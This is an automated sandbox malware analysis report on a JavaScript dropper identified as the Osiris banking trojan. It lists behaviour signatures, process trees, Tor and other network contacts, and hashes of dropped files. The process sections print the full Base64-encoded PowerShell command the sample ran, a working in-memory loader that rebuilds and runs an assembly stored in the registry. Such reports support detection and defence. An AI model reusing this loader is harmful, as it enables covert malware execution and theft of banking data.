Malware Analysis Report

2025-01-22 13:34

Sample ID 210302-ql9m1sch22
Target payload-de.js
SHA256 4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45
Tags
osiris banker botnet spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4282eb3d9f7aad6faf333be7700b1926dfac7b1827515706db6a29b40a6cdb45

Threat Level: Known bad

The file payload-de.js was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet spyware

Osiris

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Uses Tor communications

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-03-02 16:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-03-02 16:06

Reported

2021-03-02 16:08

Platform

win7v20201028

Max time kernel

112s

Max time network

13s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

Network

N/A

Files

memory/1092-2-0x0000000000000000-mapping.dmp

memory/1908-3-0x0000000002F30000-0x0000000002F34000-memory.dmp

memory/1760-4-0x0000000000000000-mapping.dmp

memory/1760-5-0x0000000076271000-0x0000000076273000-memory.dmp

memory/1760-6-0x00000000740D0000-0x00000000747BE000-memory.dmp

memory/1760-7-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

memory/1760-8-0x0000000004A00000-0x0000000004A01000-memory.dmp

memory/1760-9-0x0000000001E90000-0x0000000001E91000-memory.dmp

memory/1760-10-0x0000000001E92000-0x0000000001E93000-memory.dmp

memory/1760-11-0x0000000002530000-0x0000000002531000-memory.dmp

memory/1760-12-0x0000000002950000-0x0000000002951000-memory.dmp

memory/1760-15-0x00000000060D0000-0x00000000060D1000-memory.dmp

memory/1760-20-0x0000000006110000-0x0000000006111000-memory.dmp

memory/1760-21-0x0000000006250000-0x0000000006251000-memory.dmp

memory/1760-28-0x00000000062E0000-0x00000000062E1000-memory.dmp

memory/1760-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-03-02 16:06

Reported

2021-03-02 16:08

Platform

win10v20201028

Max time kernel

150s

Max time network

136s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

Signatures

Osiris

banker botnet osiris

Reads user/profile data of web browsers

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Uses Tor communications

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3360 set thread context of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Admin.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 672 wrote to memory of 184 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 672 wrote to memory of 184 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 184 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 184 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 184 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3360 wrote to memory of 3960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Admin.exe
PID 3960 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 3960 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 3960 wrote to memory of 776 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe
PID 3960 wrote to memory of 776 N/A C:\Users\Admin\AppData\Roaming\Admin.exe C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\payload-de.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdABzAGUAbQBhAG0AdwBiAHcAawBrAG8AawBlAGIAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "

C:\Users\Admin\AppData\Roaming\Admin.exe

"C:\Users\Admin\AppData\Roaming\Admin.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

"1577599147.exe"

Network

Country Destination Domain Proto
N/A 66.111.2.131:9030 66.111.2.131 tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 23.21.252.4:443 api.ipify.org tcp
N/A 91.203.145.114:80 91.203.145.114 tcp
N/A 185.213.20.247:443 tcp
N/A 8.8.8.8:53 time-a.nist.gov udp
N/A 129.6.15.28:13 time-a.nist.gov tcp
N/A 199.249.230.103:80 199.249.230.103 tcp
N/A 178.17.170.179:80 178.17.170.179 tcp
N/A 80.179.96.165:80 80.179.96.165 tcp
N/A 94.16.109.41:80 94.16.109.41 tcp
N/A 135.148.33.56:80 135.148.33.56 tcp
N/A 38.147.122.250:443 tcp
N/A 45.137.124.122:80 45.137.124.122 tcp
N/A 45.140.170.187:80 45.140.170.187 tcp
N/A 23.129.64.235:80 23.129.64.235 tcp
N/A 127.0.0.1:32767 tcp
N/A 51.75.75.202:80 tcp
N/A 193.234.15.60:80 193.234.15.60 tcp
N/A 158.255.7.61:80 158.255.7.61 tcp

Files

memory/672-2-0x0000022D7C820000-0x0000022D7C927000-memory.dmp

memory/184-3-0x0000000000000000-mapping.dmp

memory/3360-4-0x0000000000000000-mapping.dmp

memory/3360-5-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/3360-6-0x0000000006F70000-0x0000000006F71000-memory.dmp

memory/3360-7-0x0000000007630000-0x0000000007631000-memory.dmp

memory/3360-8-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

memory/3360-9-0x0000000006FF2000-0x0000000006FF3000-memory.dmp

memory/3360-10-0x0000000007560000-0x0000000007561000-memory.dmp

memory/3360-11-0x0000000007D50000-0x0000000007D51000-memory.dmp

memory/3360-12-0x0000000007DC0000-0x0000000007DC1000-memory.dmp

memory/3360-13-0x0000000008010000-0x0000000008011000-memory.dmp

memory/3360-14-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

memory/3360-15-0x0000000008790000-0x0000000008791000-memory.dmp

memory/3360-16-0x0000000008700000-0x0000000008701000-memory.dmp

memory/3360-17-0x0000000009760000-0x0000000009761000-memory.dmp

memory/3360-18-0x0000000009470000-0x0000000009471000-memory.dmp

memory/3360-19-0x00000000096C0000-0x00000000096C1000-memory.dmp

memory/3360-20-0x0000000009D00000-0x0000000009D01000-memory.dmp

memory/3360-21-0x0000000009870000-0x0000000009872000-memory.dmp

memory/3360-22-0x00000000099B0000-0x0000000009B23000-memory.dmp

memory/3960-23-0x0000000000400000-0x0000000000456000-memory.dmp

memory/3960-24-0x0000000000401698-mapping.dmp

C:\Users\Admin\AppData\Roaming\Admin.exe

MD5 4db1ee663bd9f021da04edca144f4bd7
SHA1 709d318281ceabef246af0107b1db12f237b793a
SHA256 3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512 ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

C:\Users\Admin\AppData\Roaming\Admin.exe

MD5 4db1ee663bd9f021da04edca144f4bd7
SHA1 709d318281ceabef246af0107b1db12f237b793a
SHA256 3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512 ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

memory/3960-28-0x00000000006C0000-0x000000000075F000-memory.dmp

memory/3960-27-0x0000000000400000-0x0000000000456000-memory.dmp

memory/1780-29-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 e66e746f849f7abbcdae47bb95507d20
SHA1 24ae1f68f97c2e58a7ade40b0223b46e87b94077
SHA256 080a258cf8f83417af114097d40367eaae83ef8bf5113e3597a2b600b1788351
SHA512 82bfcf11b48c1de0772781795636a46b7c57afa62cf7dad37e48463851800526a0521e393dd5f09996a12c6e4be785db0b933e0d4eb82223aeae697634ac3966

memory/776-33-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

MD5 9f385a9a69a4d9e18055743f0694976b
SHA1 2c2385ea964a33f803e96e364d4a05771c733921
SHA256 45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216
SHA512 e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c

C:\Users\Admin\AppData\Local\Temp\{AA04D31D-0384-4767-A455-223C4B3C564D}\1577599147.exe

MD5 9f385a9a69a4d9e18055743f0694976b
SHA1 2c2385ea964a33f803e96e364d4a05771c733921
SHA256 45f175bc165a3f8d9a05da48bdc4c1f234386588e0d003df094f72d019ae6216
SHA512 e9e78eb02bad22815648723138a7443da527779644ad9f9e776f91ba796b255c7556c5fe82ea526825c23ea376ed90d4dd5f31b026d2ff00605d8db9b0729c3c